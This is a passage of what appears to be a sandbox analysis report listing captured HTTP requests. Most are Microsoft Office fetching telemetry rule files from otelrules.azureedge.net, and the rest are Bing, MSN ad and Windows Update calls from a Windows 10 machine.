Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239398628216_1JDX0X63GXK5FYFGK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=532834141&PG=PC000P0FR5.0000000IRU&REQASID=3231C04CB2E542AD8FF0B98138491059&UNID=338389&ASID=b7a7790eefe24cf693e928a22d328dc1&&DS_EVTID=3231C04CB2E542AD8FF0B98138491059&DEVOSVER=10.0.19045.2006&REQT=20241121T085332&TIME=20241121T085341Z&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RT2Ar76CfwNaFOF&MD=4E5ho6Ol HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239398628217_1Y51RF6NU1PGVC1I5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=532834141&PG=PC000P0FR5.0000000IRU&REQASID=3231C04CB2E542AD8FF0B98138491059&UNID=338389&ASID=b7a7790eefe24cf693e928a22d328dc1&&DS_EVTID=3231C04CB2E542AD8FF0B98138491059&DEVOSVER=10.0.19045.2006&REQT=20241121T085332&TIME=20241121T085341Z&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085354Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=cb2bb42c043242769558543079a1da9e&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-88000045&oemName=dstkfa%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=dstkfa20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEKv1bfM52QovIJZ/GlI490+wAQpNh6iykWToQrnRw42RSQRR2vToYZiMgaRsz8+HWayT7YDyUUGF5mPQKeC7ZqVynuoUKSicpivtnbK8YY29gjb8py/VJSCYapXVUNTpt+U/ZMWc7Rh1WqLwSwAoTLk1GG9d6J3V+IstiyJ1nIKrVdD0gfCd47wP+tQk52QFuqNaF0OWZoPysIPqnl3bZR36j38Q4BHn8wAIosGAWJezSujeaz2BOK3rmmBvbiFFP3WQgoNVTU5Q+knRmm05xYJyhkFMdcgPcoJQKbFKb+qdgnKrNKK2APbcM6UjSinyK9cEFv4OBLELc6I/SCh0DnWkFkx2Ip9ra1/chCzhKzSg6e//jPGbTVZYx1QvEgva4Jn3AG5hQl/xjki+lH0C6uVVnvUVc8f3zIQlz7/2wZTxIrPmKiKamR7lUygh/d5RHES89LP2Q6OOO5v3cLOVK6m7eSeOTH2+jTbOxJ2UPERUHiVzTvGBIbspCPanimX95zw30mLkwiJGvqisfX3NnSLJLgReXRwG7XofDs4LW5N1oV6IljwJqh6t/XlJBzxYOYajy4SNCWQot/zRBDO+AmAMudcB&p=Cache-Control: no-cacheMS-CV: XnfZp6+Bo0ykbYbI.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8Z_v81Dv1u-hUjbGzlJ65tzVUCUyPu4-NplKM68oFgfLVKaAhGbxhP_Yix7rD1yj3DZeTe9ESVs0HufByhMqtMcvIiBN_vJ4uZO_8-OrObcoMEbWIif1LYVW0nbRv88628l9nxeu-547jSfRBWpiuOQibrC0OFZZITZ_DI0RcIKA3BrqS%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D863654e9941b19c80bb133d761025d5c&TIME=20241121T085354Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /aes/c.gif?RG=e0f6291961714da0886133ec96c47f0c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20241121T085354Z&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: www.bing.comConnection: Keep-AliveCookie: MUID=3C4135E85708611F0A8020D6566A6038
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8Z_v81Dv1u-hUjbGzlJ65tzVUCUyPu4-NplKM68oFgfLVKaAhGbxhP_Yix7rD1yj3DZeTe9ESVs0HufByhMqtMcvIiBN_vJ4uZO_8-OrObcoMEbWIif1LYVW0nbRv88628l9nxeu-547jSfRBWpiuOQibrC0OFZZITZ_DI0RcIKA3BrqS%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D863654e9941b19c80bb133d761025d5c&TIME=20241121T085354Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-AliveCookie: MUID=3C4135E85708611F0A8020D6566A6038; _EDGE_S=SID=3917F3AD2D4667EF0C48E6932CCD66C2; MR=0
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
